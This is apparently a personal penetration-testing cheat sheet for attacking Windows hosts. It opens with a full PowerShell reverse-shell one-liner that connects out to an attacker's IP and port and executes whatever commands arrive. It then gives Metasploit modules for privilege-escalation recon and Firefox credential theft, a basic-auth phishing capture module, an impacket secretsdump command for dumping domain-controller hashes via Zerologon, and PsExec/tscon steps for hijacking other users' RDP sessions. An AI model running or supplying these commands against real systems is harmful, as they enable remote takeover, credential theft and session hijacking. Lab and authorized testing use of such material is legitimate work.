# Powershell reverse shell for windows
# !!! Specify own IP and PORT !!!

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


********************************************
****** Metasploit post exploitation ********
********************************************

Modules:
    meterpreter > run post/multi/recon/local_exploit_suggester
    meterpreter > run post/windows/gather/enum_applications


********************************************
********* Firefox cresd dumping ************
********************************************

msf module:
    meterpreter > run post/multi/gather/firefox_creds

If credentials are dumped, we will be required to grab the Firefox Decrypt
tool from Github - https://github.com/unode/firefox_decrypt

********************************************
******* Privelage Escalcation Lab **********
********************************************

https://tryhackme.com/room/windowsprivescarena

********************************************
******** Use Privelage Phishing ************
********************************************

use auxiliary/server/capture/http_basic

********************************************
***** Remote HASH Dump with Zero Logon *****
********************************************

impacket-secretsdump -just-dc -no-pass <dc_name>\$@<dc_host_IP>

********************************************
********** Use other RDP session ***********
********************************************

1. Logon wia RDP to server;
2. Run cmd as administrator;
3 Run
    PsExec64.exe -s cmd.exe
4. Hijack other rdp session(above Windows Server 2019)
    tscon 3 /dest:rdp-tcp#6
